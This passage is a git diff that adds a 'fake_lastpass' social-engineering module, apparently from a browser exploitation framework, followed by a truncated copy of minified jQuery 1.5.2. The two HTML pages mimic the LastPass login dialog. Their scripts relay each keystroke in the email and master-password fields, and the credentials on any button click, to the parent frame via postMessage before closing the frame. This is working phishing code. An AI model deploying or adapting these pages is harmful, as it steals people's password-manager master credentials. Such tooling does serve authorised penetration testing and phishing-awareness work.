z_RR8tg#}U|1yUddQXmCVAO%t&1yUddQXmCVApL)k{u}Zf1dLUIG4KEY002ovPDHLk
FV1gQ>IdA{~

literal 0
HcmV?d00001

diff --git a/modules/social_engineering/fake_lastpass/index.html b/modules/social_engineering/fake_lastpass/index.html
new file mode 100644
index 000000000..7a7855b66
--- /dev/null
+++ b/modules/social_engineering/fake_lastpass/index.html
@@ -0,0 +1,188 @@
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta http-equiv="Pragma" CONTENT="no-cache"><meta http-equiv="Expires" CONTENT="0"><meta http-equiv="CACHE-CONTROL" CONTENT="no-cache">
+<style type="text/css">
+body { font-family: Helvetica,Arial;
+color:white;}
+
+#_docwrite_login_small7 { white-space:normal; width:258px !important; display:inline-block; }
+#showvault { vertical-align: top; }
+
+/* General */
+.clear         {clear:both;font-size:0;height:0;line-height:0;overflow:hidden;}
+
+table td       {
+	padding-right:10px;
+	white-space:nowrap;
+}
+
+
+	
+.dropStyle {
+  border:thin solid white;
+background: #919191 !important; /* for non-css3 browsers */
+  background: -webkit-gradient(linear, left top, left bottom, from(#a9a9a9), to(#7a7a7a)); /* for webkit browsers */
+  font-weight: bold;
+  color: #e7e5e5;
+  position:absolute;
+  cursor:default;
+  text-align:left;
+  font-size:12px;
+  z-index:10000;
+  height:120px;
+  overflow:auto;
+  }
+.item {
+}
+.focus {
+background: #0399d4 !important; /* for non-css3 browsers */
+	background: -webkit-gradient(linear, left top, left bottom, from(#04acec), to(#0186ba)) !important; /* for webkit browsers */
+	color: #fff !important;
+	-webkit-border-radius: 0;
+	-moz-border-radius: 0;
+	text-shadow: 0 1px 1px rgba(0, 0, 0, .1);
+	cursor:hand
+}
+
+.item[aria-disabled="true"] {
+  color: grey;
+}
+.offscreen {
+   position: absolute;
+  left: -9000px;
+  width: 0;
+  overflow: hidden;
+}
+
+body { padding:20px 10px 0px 50px; font:13px/150% Helvetica, Arial, Tahoma, sans-serif; }
+
+body{
+	background:url('q3Jrp.png') repeat;
+}
+
+.logintitle{
+font-size:16px; font-weight:bold; 
+text-shadow:1px 1px 2px #858585
+}
+
+/**.css3button { background-image:url(images/menu_btnsmall.png); height:30px; width:95px; line-height:30px; font-size:12px; color:white; text-align:center;
+cursor:hand;
+font-weight:bold;
+text-shadow:1px 1px 2px #858585}
+.css3button:hover { background-image:url(images/menuroll_btnsmall.png); cursor:hand; } **/
+
+.css3button {
+	font-family: Helvetica, Arial, sans-serif; font-weight:bold;
+	font-size: 14px;
+	color: #ffffff;
+	padding: 2px 15px;
+	background: -webkit-linear-gradient(top, rgba(32,188,232,1) 0%,rgba(0,119,232,1) 100%);
+	-webkit-border-radius: 30px;
+	border: 2px solid #ffffff;
+	-webkit-box-shadow:
+		0px 3px 11px rgba(000,000,000,0.5),
+		inset 0px 0px 1px rgba(005,000,004,1);
+	text-shadow:
+		0px -1px 0px rgba(000,000,000,0.2),
+		0px 1px 0px rgba(255,255,255,0.3);
+}
+
+.css3button:hover {
+	cursor:hand;
+	 background:-webkit-gradient(linear, left top, left bottom, color-stop(0%,#158aff), color-stop(44%,#0b7ef1), color-stop(100%,#126eca));
+}
+
+/** text area input with shadow **/
+
+
+.textarea { 
+	-webkit-transition: all 0.30s ease-in-out;
+	padding-left: 7px;
+	width:200px;
+	border: solid 1px #E5E5E5;
+	outline: 0;
+	font: normal 13px/100% Helvetica, Arial, Tahoma, sans-serif;
+	box-shadow: rgba(0,0,0, 0.1) 0px 0px 8px;
+	-moz-box-shadow: rgba(0,0,0, 0.1) 0px 0px 8px;
+	-webkit-box-shadow: inset 1 3px 1 hsla(0,0%,0%,0.1);
+	-webkit-border-radius: 10px;
+	}
+	
+checkbox {
+	padding: 4px;
+	}
+
+
+/** input focus darkening **/
+
+/*
+.textarea:hover, .textarea:focus { 
+	border-color: #C9C9C9; 
+	-webkit-box-shadow: 0px 0px 5px 2px #3d8bff;
+	}
+*/
+
+.glow { 
+	border-color: #C9C9C9; 
+   	-webkit-box-shadow:0 0 1px 3px hsla(210,100%,50%,0.8), 0 1px 0 hsla(0,0%,100%,0.3);
+
+	}
+
+
+.form label { 
+	margin-left: 10px; 
+	color: #999999;
+	font-weight:bold; 
+	}
+
+a:link, a:active {
+	font-weight : bold;
+	font-size : 12px;
+	font-family : helvetica;
+	color :white;
+	text-decoration : none;
+	padding-left:10px
+	}
+	
+	a:hover {
+		font-weight : bold;
+		font-size : 12px;
+		font-family : helvetica;
+		color : #09F;
+		text-decoration : none;
+		}
+		
+</style>
+<script src="jquery.js" type="text/javascript"></script>
+<script>
+$(document).ready(function() {
+	$('#u').keyup(function() {
+		parent.postMessage('Username field changed to: ' + $('#u').val(),'*');
+	});
+
+	$('#p').keyup(function() {
+		parent.postMessage('Password field changed to: ' + $('#p').val(),'*');
+	});
+
+	$('#rememberemail').change(function() {
+		parent.postMessage('Remember Email changed to: ' + $('#rememberemail').prop('checked'),'*');
+	});
+
+	$('#rememberpassword').change(function() {
+		parent.postMessage('Remember Password changed to: ' + $('#rememberpassword').prop('checked'),'*');
+	});
+
+	$('#showvault').change(function() {
+		parent.postMessage('Show Vault changed to: ' + $('#showvault').prop('checked'),'*');
+	});
+
+	$('#login,#cancel,#forgot,#screenkeyboard,#createaccount').click(function() {
+		parent.postMessage('Button Clicked - username field: ' + $('#u').val() + '; password field: ' + $('#p').val(),'*');
+		parent.postMessage('KILLFRAME','*');
+	});
+
+});
+
+</script>
+</head><body><img src='lpwhite_small.png'/><p><div id="reprompttext" style="display: none;"><br><span id="_docwrite_login_small1"></span><br><br></div><div id="nodbtext" style="display: none; color: red;"><br><b><span id="_docwrite_login_small2"></span></b><br><br></div>
+<form id='f'><table><tr><td class='logintitle'><span id="_docwrite_login_small3">Email</span></td></tr><tr><td><input type='text' id='u' class='textarea' name='username' value=''/>&nbsp;&nbsp;<img id="deleteicon" src="xsmall.png" valign="middle"></td></tr><tr><td class='logintitle'><span id="_docwrite_login_small4">Password</span></td></tr><tr><td><input type='password' class='textarea' id='p' name='password'/></td></tr><tr id="rememberemailrow"><td><input type='checkbox' name='rememberemail' id='rememberemail'/>&nbsp;&nbsp;<label for="rememberemail"><span id="_docwrite_login_small5">Remember Email</span></label></td></tr><tr id="rememberpasswordrow"><td><input type='checkbox' name='rememberpassword' id='rememberpassword'/>&nbsp;&nbsp;<label for="rememberpassword"><span id="_docwrite_login_small6">Remember Password</span></label></td></tr><tr id="showvaultrow"><td><input type='checkbox' name='showvault' id='showvault'/>&nbsp;&nbsp;<label for="showvault"><span id="_docwrite_login_small7">Show Vault After Login</span></label></td></tr><tr id="donotrepromptforrow" style="display: none;"><td>&nbsp;</td><td><input type='checkbox' name='donotrepromptfor' id='donotrepromptfor'/>&nbsp;&nbsp;<label for="donotrepromptfor"><span id="_docwrite_login_small8"></span></label><select id="donotrepromptforsecs"><option value="0"></option><option value="30" id="_docwrite_login_small9"></option><option value="60" id="_docwrite_login_small10"></option><option value="300" id="_docwrite_login_small11"></option><option value="900" id="_docwrite_login_small12"></option><option value="1800" id="_docwrite_login_small13"></option><option value="3600" id="_docwrite_login_small14"></option><option value="10800" id="_docwrite_login_small15"></option><option value="21600" id="_docwrite_login_small16"></option><option value="43200" id="_docwrite_login_small17"></option><option value="86400" id="_docwrite_login_small18"></option></select></td></tr><div id='btnrow' class='btnrow'><table class='buttontable'><tr><td><div class='css3button' id='login'/><span id="_docwrite_login_small19">Login</span></div></div></td><td><div class='css3button' id='cancel'/><span id="_docwrite_login_small20">Cancel</span></div></td></tr></table></div></td></table></table></form><div id='links'><span id="forgotcontainer"><img src="key_small.png"><a id='forgot' href='#'><span id="_docwrite_login_small21">I forgot my password, Help</span></a><br/></span><span id="screenkeyboardcontainer"><img src="screenkeyboard.png"><a id='screenkeyboard' href='#'><span id="_docwrite_login_small22">Screen Keyboard</span></a><br/></span><span id="createaccountcontainer"><img src="create_small.png"><a id='createaccount' href='#'><span id="_docwrite_login_small23">Create Account</span></a><br/></span></div><div id='error'></div>
+
+</body></html>
diff --git a/modules/social_engineering/fake_lastpass/indexFF.html b/modules/social_engineering/fake_lastpass/indexFF.html
new file mode 100644
index 000000000..f10985485
--- /dev/null
+++ b/modules/social_engineering/fake_lastpass/indexFF.html
@@ -0,0 +1,72 @@
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta http-equiv="Pragma" CONTENT="no-cache"><meta http-equiv="Expires" CONTENT="0"><meta http-equiv="CACHE-CONTROL" CONTENT="no-cache">
+<style type="text/css">
+body { font-family: Helvetica,Arial;
+color:-moz-DialogText;
+background-color: #ededed;
+font: message-box;
+}
+
+
+</style>
+<script src="jquery.js" type="text/javascript"></script>
+<script>
+$(document).ready(function() {
+	$('#u').keyup(function() {
+		parent.postMessage('Username field changed to: ' + $('#u').val(),'*');
+	});
+
+	$('#p').keyup(function() {
+		parent.postMessage('Password field changed to: ' + $('#p').val(),'*');
+	});
+
+	$('#rememberemail').change(function() {
+		parent.postMessage('Remember Email changed to: ' + $('#rememberemail').prop('checked'),'*');
+	});
+
+	$('#rememberpassword').change(function() {
+		parent.postMessage('Remember Password changed to: ' + $('#rememberpassword').prop('checked'),'*');
+	});
+
+	$('#showvault').change(function() {
+		parent.postMessage('Show Vault changed to: ' + $('#showvault').prop('checked'),'*');
+	});
+
+	$('#disableffpwd').change(function() {
+		parent.postMessage('Disable FF Password Management changed to: ' + $('disableffpwd').prop('checked'),'*');
+	});
+
+	$('#login,#cancel,#forgot,#screenkeyboard,#createaccount').click(function() {
+		parent.postMessage('Button Clicked - username field: ' + $('#u').val() + '; password field: ' + $('#p').val(),'*');
+		parent.postMessage('KILLFRAME','*');
+	});
+
+});
+
+</script>
+</head><body>
+
+<div style="text-align: center; padding-bottom:5px"><img src="icon.png" /></div>
+<form>
+<div style="text-align: center">
+	<div style="text-align: left; padding-bottom:5px">Email</div>
+	<div style="text-align: left; padding-bottom:5px"><input type="text" style="width:245px;height:20px" id='u' /></div>
+	<div style="text-align: left; padding-bottom:5px">Master Password</div>
+	<div style="text-align: left; padding-bottom:5px"><input type="password" style="width:245px;height:20px" id='p' /></div>
+	<div style="text-align: left; padding-bottom:5px"><input type="checkbox" checked="checked" id='rememberemail'>Remember Email</input></div>
+	<div style="text-align: left; padding-bottom:5px"><input type="checkbox" id='rememberpassword'>Remember Password</input></div>
+	<div style="text-align: left; padding-bottom:5px"><input type="checkbox" checked="checked" id='showvault'>Show My LastPass Vault After Login</input></div>
+	<div style="text-align: left; padding-bottom:10px"><input type="checkbox" checked="checked" id='disableffpwd'>Disable Insecure Firefox Password Management</input></div>
+</div>
+
+<div style="text-align:center; padding-bottom:5px">
+	<div style="text-align:left; padding-bottom: 5px"><a href="#" style="text-decoration: none" id='forgot'>I forgot my password, Help!</a></div>
+	<div style="text-align:left; padding-bottom: 10px"><a href="#" style="text-decoration: none" id='screenkeyboard'>Screen Keyboard</a> &nbsp;&nbsp; <a href="#" style="text-decoration: none" id='createaccount'>Create an Account</a></div>
+</div>
+
+<div style="text-align:right">
+	<input type="button" value="Cancel" style="width:77px; height:21px" id='cancel' /> <input type="button" value="Login" style="width:77px; height:21px" id='login' />
+</div>
+</form>
+
+
+</body></html>
\ No newline at end of file
diff --git a/modules/social_engineering/fake_lastpass/jquery-1.5.2.min.js b/modules/social_engineering/fake_lastpass/jquery-1.5.2.min.js
new file mode 100644
index 000000000..f78f96a12
--- /dev/null
+++ b/modules/social_engineering/fake_lastpass/jquery-1.5.2.min.js
@@ -0,0 +1,16 @@
+/*!
+ * jQuery JavaScript Library v1.5.2
+ * http://jquery.com/
+ *
+ * Copyright 2011, John Resig
+ * Dual licensed under the MIT or GPL Version 2 licenses.
+ * http://jquery.org/license
+ *
+ * Includes Sizzle.js
+ * http://sizzlejs.com/
+ * Copyright 2011, The Dojo Foundation
+ * Released under the MIT, BSD, and GPL Licenses.
+ *
+ * Date: Thu Mar 31 15:28:23 2011 -0400
+ */
+(function(a,b){function ci(a){return d.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cf(a){if(!b_[a]){var b=d("<"+a+">").appendTo("body"),c=b.css("display");b.remove();if(c==="none"||c==="")c="block";b_[a]=c}return b_[a]}function ce(a,b){var c={};d.each(cd.concat.apply([],cd.slice(0,b)),function(){c[this]=a});return c}function b$(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function bZ(){try{return new a.XMLHttpRequest}catch(b){}}function bY(){d(a).unload(function(){for(var a in bW)bW[a](0,1)})}function bS(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var e=a.dataTypes,f={},g,h,i=e.length,j,k=e[0],l,m,n,o,p;for(g=1;g<i;g++){if(g===1)for(h in a.converters)typeof h==="string"&&(f[h.toLowerCase()]=a.converters[h]);l=k,k=e[g];if(k==="*")k=l;else if(l!=="*"&&l!==k){m=l+" "+k,n=f[m]||f["* "+k];if(!n){p=b;for(o in f){j=o.split(" ");if(j[0]===l||j[0]==="*"){p=f[j[1]+" "+k];if(p){o=f[o],o===!0?n=p:p===!0&&(n=o);break}}}}!n&&!p&&d.error("No conversion from "+m.replace(" "," to ")),n!==!0&&(c=n?n(c):p(o(c)))}}return c}function bR(a,c,d){var e=a.contents,f=a.dataTypes,g=a.responseFields,h,i,j,k;for(i in g)i in d&&(c[g[i]]=d[i]);while(f[0]==="*")f.shift(),h===b&&(h=a.mimeType||c.getResponseHeader("content-type"));if(h)for(i in e)if(e[i]&&e[i].test(h)){f.unshift(i);break}if(f[0]in d)j=f[0];else{for(i in d){if(!f[0]||a.converters[i+" "+f[0]]){j=i;break}k||(k=i)}j=j||k}if(j){j!==f[0]&&f.unshift(j);return d[j]}}function bQ(a,b,c,e){if(d.isArray(b)&&b.length)d.each(b,function(b,f){c||bs.test(a)?e(a,f):bQ(a+"["+(typeof f==="object"||d.isArray(f)?b:"")+"]",f,c,e)});else if(c||b==null||typeof b!=="object")e(a,b);else if(d.isArray(b)||d.isEmptyObject(b))e(a,"");else for(var f in b)bQ(a+"["+f+"]",b[f],c,e)}function bP(a,c,d,e,f,g){f=f||c.dataTypes[0],g=g||{},g[f]=!0;var h=a[f],i=0,j=h?h.length:0,k=a===bJ,l;for(;i<j&&(k||!l);i++)l=h[i](c,d,e),typeof l==="string"&&(!k||g[l]?l=b:(c.dataTypes.unshift(l),l=bP(a,c,d,e,l,g)));(k||!l)&&!g["*"]&&(l=bP(a,c,d,e,"*",g));return l}function bO(a){return function(b,c){typeof b!=="string"&&(c=b,b="*");if(d.isFunction(c)){var e=b.toLowerCase().split(bD),f=0,g=e.length,h,i,j;for(;f<g;f++)h=e[f],j=/^\+/.test(h),j&&(h=h.substr(1)||"*"),i=a[h]=a[h]||[],i[j?"unshift":"push"](c)}}}function bq(a,b,c){var e=b==="width"?bk:bl,f=b==="width"?a.offsetWidth:a.offsetHeight;if(c==="border")return f;d.each(e,function(){c||(f-=parseFloat(d.css(a,"padding"+this))||0),c==="margin"?f+=parseFloat(d.css(a,"margin"+this))||0:f-=parseFloat(d.css(a,"border"+this+"Width"))||0});return f}function bc(a,b){b.src?d.ajax({url:b.src,async:!1,dataType:"script"}):d.globalEval(b.text||b.textContent||b.innerHTML||""),b.parentNode&&b.parentNode.removeChild(b)}function bb(a){return"getElementsByTagName"in a?a.getElementsByTagName("*"):"querySelectorAll"in a?a.querySelectorAll("*"):[]}function ba(a,b){if(b.nodeType===1){var c=b.nodeName.toLowerCase();b.clearAttributes(),b.mergeAttributes(a);if(c==="object")b.outerHTML=a.outerHTML;else if(c!=="input"||a.type!=="checkbox"&&a.type!=="radio"){if(c==="option")b.selected=a.defaultSelected;else if(c==="input"||c==="textarea")b.defaultValue=a.defaultValue}else a.checked&&(b.defaultChecked=b.checked=a.checked),b.value!==a.value&&(b.value=a.value);b.removeAttribute(d.expando)}}function _(a,b){if(b.nodeType===1&&d.hasData(a)){var c=d.expando,e=d.data(a),f=d.data(b,e);if(e=e[c]){var g=e.events;f=f[c]=d.extend({},e);if(g){delete f.handle,f.events={};for(var h in g)for(var i=0,j=g[h].length;i<j;i++)d.event.add(b,h+(g[h][i].namespace?".":"")+g[h][i].namespace,g[h][i],g[h][i].data)}}}}function $(a,b){return d.nodeName(a,"table")?a.getElementsByTagName("tbody")[0]||a.appendChild(a.ownerDocument.createElement("tbody")):a}function Q(a,b,c){if(d.isFunction(b))return d.grep(a,function(a,d){var e=!!b.call(a,d,a);return e===c});if(b.nodeType)return d.grep(a,function(a,d){return a===b===c});if(typeof b==="string"){var e=d.grep(a,function(a){return a.nodeType===1});if(L.test(b))return d.filter(b,e,!c);b=d.filter(b,e)}return d.grep(a,function(a,e){return d.inArray(a,b)>=0===c})}function P(a){return!a||!a.parentNode||a.parentNode.nodeType===11}function H(a,b){return(a&&a!=="*"?a+".":"")+b.replace(t,"`").replace(u,"&")}function G(a){var b,c,e,f,g,h,i,j,k,l,m,n,o,p=[],q=[],s=d._data(this,"events");if(a.liveFired!==this&&s&&s.live&&!a.target.disabled&&(!a.button||a.type!=="click")){a.namespace&&(n=new RegExp("(^|\\.)"+a.namespace.split(".").join("\\.(?:.*\\.)?")+"(\\.|$)")),a.liveFired=this;var t=s.live.slice(0);for(i=0;i<t.length;i++)g=t[i],g.origType.replace(r,"")===a.type?q.push(g.selector):t.splice(i--,1);f=d(a.target).closest(q,a.currentTarget);for(j=0,k=f.length;j<k;j++){m=f[j];for(i=0;i<t.length;i++){g=t[i];if(m.selector===g.selector&&(!n||n.test(g.namespace))&&!m.elem.disabled){h=m.elem,e=null;if(g.preType==="mouseenter"||g.preType==="mouseleave")a.type=g.preType,e=d(a.relatedTarget).closest(g.selector)[0];(!e||e!==h)&&p.push({elem:h,handleObj:g,level:m.level})}}}for(j=0,k=p.length;j<k;j++){f=p[j];if(c&&f.level>c)break;a.currentTarget=f.elem,a.data=f.handleObj.data,a.handleObj=f.handleObj,o=f.handleObj.origHandler.apply(f.elem,arguments);if(o===!1||a.isPropagationStopped()){c=f.level,o===!1&&(b=!1);if(a.isImmediatePropagationStopped())break}}return b}}function E(a,c,e){var f=d.extend({},e[0]);f.type=a,f.originalEvent={},f.liveFired=b,d.event.handle.call(c,f),f.isDefaultPrevented()&&e[0].preventDefault()}function y(){return!0}function x(){return!1}function i(a){for(var b in a)if(b!=="toJSON")return!1;return!0}function h(a,c,e){if(e===b&&a.nodeType===1){e=a.getAttribute("data-"+c);if(typeof e==="string"){try{e=e==="true"?!0:e==="false"?!1:e==="null"?null:d.isNaN(e)?g.test(e)?d.parseJSON(e):e:parseFloat(e)}catch(f){}d.data(a,c,e)}else e=b}return e}var c=a.document,d=function(){function G(){if(!d.isReady){try{c.documentElement.doScroll("left")}catch(a){setTimeout(G,1);return}d.ready()}}var d=function(a,b){return new d.fn.init(a,b,g)},e=a.jQuery,f=a.$,g,h=/^(?:[^<]*(<[\w\W]+>)[^>]*$|#([\w\-]+)$)/,i=/\S/,j=/^\s+/,k=/\s+$/,l=/\d/,m=/^<(\w+)\s*\/?>(?:<\/\1>)?$/,n=/^[\],:{}\s]*$/,o=/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,p=/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,q=/(?:^|:|,)(?:\s*\[)+/g,r=/(webkit)[ \/]([\w.]+)/,s=/(opera)(?:.*version)?[ \/]([\w.]+)/,t=/(msie) ([\w.]+)/,u=/(mozilla)(?:.*? rv:([\w.]+))?/,v=navigator.userAgent,w,x,y,z=Object.prototype.toString,A=Object.prototype.hasOwnProperty,B=Array.prototype.push,C=Array.prototype.slice,D=String.prototype.trim,E=Array.prototype.indexOf,F={};d.fn=d.prototype={constructor:d,init:function(a,e,f){var g,i,j,k;if(!a)return this;if(a.nodeType){this.context=this[0]=a,this.length=1;return this}if(a==="body"&&!e&&c.body){this.context=c,this[0]=c.body,this.selector="body",this.length=1;return this}if(typeof a==="string"){g=h.exec(a);if(!g||!g[1]&&e)return!e||e.jquery?(e||f).find(a):this.constructor(e).find(a);if(g[1]){e=e instanceof d?e[0]:e,k=e?e.ownerDocument||e:c,j=m.exec(a),j?d.isPlainObject(e)?(a=[c.createElement(j[1])],d.fn.attr.call(a,e,!0)):a=[k.createElement(j[1])]:(j=d.buildFragment([g[1]],[k]),a=(j.cacheable?d.clone(j.fragment):j.fragment).childNodes);return d.merge(this,a)}i=c.getElementById(g[2]);if(i&&i.parentNode){if(i.id!==g[2])return f.find(a);this.length=1,this[0]=i}this.context=c,this.selector=a;return this}if(d.isFunction(a))return f.ready(a);a.selector!==b&&(this.selector=a.selector,this.context=a.context);return d.makeArray(a,this)},selector:"",jquery:"1.5.2",length:0,size:function(){return this.length},toArray:function(){return C.call(this,0)},get:function(a){return a==null?this.toArray():a<0?this[this.length+a]:this[a]},pushStack:function(a,b,c){var e=this.constructor();d.isArray(a)?B.apply(e,a):d.merge(e,a),e.prevObject=this,e.context=this.context,b==="find"?e.selector=this.selector+(this.selector?" ":"")+c:b&&(e.selector=this.selector+"."+b+"("+c+")");return e},each:function(a,b){return d.each(this,a,b)},ready:function(a){d.bindReady(),x.done(a);return this},eq:function(a){return a===-1?this.slice(a):this.slice(a,+a+1)},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},slice:function(){return this.pushStack(C.apply(this,arguments),"slice",C.call(arguments).join(","))},map:function(a){return this.pushStack(d.map(this,function(b,c){return a.call(b,c,b)}))},end:function(){return this.prevObject||this.constructor(null)},push:B,sort:[].sort,splice:[].splice},d.fn.init.prototype=d.fn,d.extend=d.fn.extend=function(){var a,c,e,f,g,h,i=arguments[0]||{},j=1,k=arguments.length,l=!1;typeof i==="boolean"&&(l=i,i=arguments[1]||{},j=2),typeof i!=="object"&&!d.isFunction(i)&&(i={}),k===j&&(i=this,--j);for(;j<k;j++)if((a=arguments[j])!=null)for(c in a){e=i[c],f=a[c];if(i===f)continue;l&&f&&(d.isPlainObject(f)||(g=d.isArray(f)))?(g?(g=!1,h=e&&d.isArray(e)?e:[]):h=e&&d.isPlainObject(e)?e:{},i[c]=d.extend(l,h,f)):f!==b&&(i[c]=f)}return i},d.extend({noConflict:function(b){a.$=f,b&&(a.jQuery=e);return d},isReady:!1,readyWait:1,ready:function(a){a===!0&&d.readyWait--;if(!d.readyWait||a!==!0&&!d.isReady){if(!c.body)return setTimeout(d.ready,1);d.isReady=!0;if(a!==!0&&--d.readyWait>0)return;x.resolveWith(c,[d]),d.fn.trigger&&d(c).trigger("ready").unbind("ready")}},bindReady:function(){if(!x){x=d._Deferred();if(c.readyState==="complete")return setTimeout(d.ready,1);if(c.addEventListener)c.addEventListener("DOMContentLoaded",y,!1),a.addEventListener("load",d.ready,!1);else if(c.attachEvent){c.attachEvent("onreadystatechange",y),a.attachEvent("onload",d.ready);var b=!1;try{b=a.frameElement==null}catch(e){}c.documentElement.doScroll&&b&&G()}}},isFunction:function(a){return d.type(a)==="function"},isArray:Array.isArray||function(a){return d.type(a)==="array"},isWindow:function(a){return a&&typeof a==="object"&&"setInterval"in a},isNaN:function(a){return a==null||!l.test(a)||isNaN(a)},type:function(a){return a==null?String(a):F[z.call(a)]||"object"},isPlainObject:function(a){if(!a||d.type(a)!=="object"||a.nodeType||d.isWindow(a))return!1;if(a.constructor&&!A.call(a,"constructor")&&!A.call(a.constructor.prototype,"isPrototypeOf"))return!1;var c;for(c in a){}return c===b||A.call(a,c)},isEmptyObject:function(a){for(var b in a)return!1;return!0},error:function(a){throw a},parseJSON:function(b){if(typeof b!=="string"||!b)return null;b=d.trim(b);if(n.test(b.replace(o,"@").replace(p,"]").replace(q,"")))return a.JSON&&a.JSON.parse?a.JSON.parse(b):(new Function("return "+b))();d.error("Invalid JSON: "+b)},parseXML:function(b,c,e){a.DOMParser?(e=new DOMParser,c=e.parseFromString(b,"text/xml")):(c=new ActiveXObject("Microsoft.XMLDOM"),c.async="false",c.loadXML(b)),e=c.documentElement,(!e||!e.nodeName||e.nodeName==="parsererror")&&d.error("Invalid XML: "+b);return c},noop:function(){},globalEval:function(a){if(a&&i.test(a)){var b=c.head||c.getElementsByTagName("head")[0]||c.documentElement,e=c.createElement("script");d.support.scriptEval()?e.appendChild(c.createTextNode(a)):e.text=a,b.insertBefore(e,b.firstChild),b.removeChild(e)}},nodeName:function(a,b){return a.nodeName&&a.nodeName.toUpperCase()===b.toUpperCase()},each:function(a,c,e){var f,g=0,h=a.length,i=h===b||d.isFunction(a);if(e){if(i){for(f in a)if(c.apply(a[f],e)===!1)break}else for(;g<h;)if(c.apply(a[g++],e)===!1)break}else if(i){for(f in a)if(c.call(a[f],f,a[f])===!1)break}else for(var j=a[0];g<h&&c.call(j,g,j)!==!1;j=a[++g]){}return a},trim:D?function(a){return a==null?"":D.call(a)}:function(a){return a==null?"":(a+"").replace(j,"").replace(k,"")},makeArray:function(a,b){var c=b||[];if(a!=null){var e=d.type(a);a.length==null||e==="string"||e==="function"||e==="regexp"||d.isWindow(a)?B.call(c,a):d.merge(c,a)}return c},inArray:function(a,b){if(b.indexOf)return b.indexOf(a);for(var c=0,d=b.length;c<d;c++)if(b[c]===a)return c;return-1},merge:function(a,c){var d=a.length,e=0;if(typeof c.length==="number")for(var f=c.length;e<f;e++)a[d++]=c[e];else while(c[e]!==b)a[d++]=c[e++];a.length=d;return a},grep:function(a,b,c){var d=[],e;c=!!c;for(var f=0,g=a.length;f<g;f++)e=!!b(a[f],f),c!==e&&d.push(a[f]);return d},map:function(a,b,c){var d=[],e;for(var f=0,g=a.length;f<g;f++)e=b(a[f],f,c),e!=null&&(d[d.length]=e);return d.concat.apply([],d)},guid:1,proxy:function(a,c,e){arguments.length===2&&(typeof c==="string"?(e=a,a=e[c],c=b):c&&!d.isFunction(c)&&(e=c,c=b)),!c&&a&&(c=function(){return a.apply(e||this,arguments)}),a&&(c.guid=a.guid=a.guid||c.guid||d.guid++);return c},access:function(a,c,e,f,g,h){var i=a.length;if(typeof c==="object"){for(var j in c)d.access(a,j,c[j],f,g,e);return a}if(e!==b){f=!h&&f&&d.isFunction(e);for(var k=0;k<i;k++)g(a[k],c,f?e.call(a[k],k,g(a[k],c)):e,h);return a}return i?g(a[0],c):b},now:function(){return(new Date).getTime()},uaMatch:function(a){a=a.toLowerCase();var b=r.exec(a)||s.exec(a)||t.exec(a)||a.indexOf("compatible")<0&&u.exec(a)||[];return{browser:b[1]||"",version:b[2]||"0"}},sub:function(){function a(b,c){return new a.fn.init(b,c)}d.extend(!0,a,this),a.superclass=this,a.fn=a.prototype=this(),a.fn.constructor=a,a.subclass=this.subclass,a.fn.init=function b(b,c){c&&c instanceof d&&!(c instanceof a)&&(c=a(c));return d.fn.init.call(this,b,c,e)},a.fn.init.prototype=a.fn;var e=a(c);return a},browser:{}}),d.each("Boolean Number String Function Array Date RegExp Object".split(" "),function(a,b){F["[object "+b+"]"]=b.toLowerCase()}),w=d.uaMatch(v),w.browser&&(d.browser[w.browser]=!0,d.browser.version=w.version),d.browser.webkit&&(d.browser.safari=!0),E&&(d.inArray=function(a,b){return E.call(b,a)}),i.test(" ")&&(j=/^[\s\xA0]+/,k=/[\s\xA0]+$/),g=d(c),c.addEventListener?y=function(){c.removeEventListener("DOMContentLoaded",y,!1),d.ready()}:c.attachEvent&&(y=function(){c.readyState==="complete"&&(c.detachEvent("onreadystatechange",y),d.ready())});return d}(),e="then done fail isResolved isRejected promise".split(" "),f=[].slice;d.extend({_Deferred:function(){var a=[],b,c,e,f={done:function(){if(!e){var c=arguments,g,h,i,j,k;b&&(k=b,b=0);for(g=0,h=c.length;g<h;g++)i=c[g],j=d.type(i),j==="array"?f.done.apply(f,i):j==="function"&&a.push(i);k&&f.resolveWith(k[0],k[1])}return this},resolveWith:function(d,f){if(!e&&!b&&!c){f=f||[],c=1;try{while(a[0])a.shift().apply(d,f)}finally{b=[d,f],c=0}}return this},resolve:function(){f.resolveWith(this,arguments);return this},isResolved:function(){return c||b},cancel:function(){e=1,a=[];return this}};return f},Deferred:function(a){var b=d._Deferred(),c=d._Deferred(),f;d.extend(b,{then:function(a,c){b.done(a).fail(c);return this},fail:c.done,rejectWith:c.resolveWith,reject:c.resolve,isRejected:c.isResolved,promise:function(a){if(a==null){if(f)return f;f=a={}}var c=e.length;while(c--)a[e[c]]=b[e[c]];return a}}),b.done(c.cancel).fail(b.cancel),delete b.cancel,a&&a.call(b,b);return b},when:function(a){function i(a){return function(c){b[a]=arguments.length>1?f.call(arguments,0):c,--g||h.resolveWith(h,f.call(b,0))}}var b=arguments,c=0,e=b.length,g=e,h=e<=1&&a&&d.isFunction(a.promise)?a:d.Deferred();if(e>1){for(;c<e;c++)b[c]&&d.isFunction(b[c].promise)?b[c].promise().then(i(c),h.reject):--g;g||h.resolveWith(h,b)}else h!==a&&h.resolveWith(h,e?[a]:[]);return h.promise()}}),function(){d.support={};var b=c.createElement("div");b.style.display="none",b.innerHTML="   <link/><table></table><a href='/a' style='color:red;float:left;opacity:.55;'>a</a><input type='checkbox'/>";var 